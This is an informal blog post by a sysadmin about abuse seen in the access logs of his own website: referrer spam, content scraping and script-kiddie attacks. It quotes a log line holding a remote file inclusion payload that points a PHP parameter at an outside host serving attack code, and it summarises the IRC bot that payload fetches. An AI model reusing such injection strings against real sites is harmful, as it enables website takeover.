there are bad people everywhere and internet is no exception

wherever there are people, there are good and bad people

lets talk about bad people on the internet misusing osadmin.com

what do they do?

a couple of things

some do referrer poisoning

it’s a technique where they visit your website or just ask for parts of it (images etc.) using fake referrers

why do they do it?

well they hope their website (or their website URL) will turn out in your web statistics software and you’ll click there

they’re just spammers that want you to go there and read an ad or possibly get infected by a virus or similar

next there are people who steal your content

I said on my website that all of this is copyrighted by me

but they have automatic bots, programs, that search the web for blogs and other stuff and steal content

some of them, the more decent ones, just use like 2 lines or so from my website and link to my website

but some of them use all the text from a blog article without mentioning the source

like this one

Host: 70.94.6.217 /mire_blog/wp-includes/images/smilies/icon_smile.gif
Http Code: 200 Date: Apr 14 22:27:48 Http Version: HTTP/1.1 Size in Bytes: 174
Referer: http://weblog.xanga.com/lyudi/652178887/waiting-the-water.html
Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)


here you see his ip address, the url he tried to open on my website (the smiley icon), date when he did it and the referrer
when you actually go there you see my content without the link to my website but before that, he grays the screen and asks for your email address so he can spam you a bit more
oh yeah, and that user agent (mozilla etc.) is fake also

and then there are those who try to break my website by using wordpress crack programs
they are called script kiddies because they use cracking programs somebody else wrote
most of them are teenagers that instead of getting high by thinking about chicks get high on breaking and destroying other people’s websites

now, here’s an example

/category/rss.php?phpraid_dir=http://mcleanmkting.com/catalog/images/default/iyes.txt??
Http Code: 302 Date: Apr 15 01:28:10 Http Version: HTTP/1.1 Size in Bytes: 468
Referer: -
Agent: libwww-perl/5.808


here you see this client asked for my rss and he provided a parameter called phpraid_dir with the url http://mcleanmkting.com/catalog/images/default/iyes.txt??
that means he tried to use that url as an include file in my website script
that is not a text file but a program, a php file that tries to see which of the shell commands work on my system
in also reports which operating system I am using, disk free space etc.

then, it tries to load a perl script from the url http://mcleanmkting.com/catalog/images/default/hai.txt using various download methods because they don’t know which ones work on my system

this perl script is meant to take over the website and to report to the cracker on IRC so he can use the IRC to control my website

the program accepts instructions from nicks sec or SNapper and it communicates with them via IRC private messaging

it’s got a watcher for milw0rm rss feed, tcp/udp flooder, portscan, log destroyer, emailer etc.

I’m a programmer/sysadmin so those tricks will not be so successful on me/my website as they might be on the others because I update my software and track my website activity

I’ve always been a whitehat, meaning I try to make websites work and I write code to do some work

instead those people are blackhat, crackers trying to destroy your website for their own personal benefit

and they’re getting worse by the day

I hope this has been informative, check back osadmin.com for more later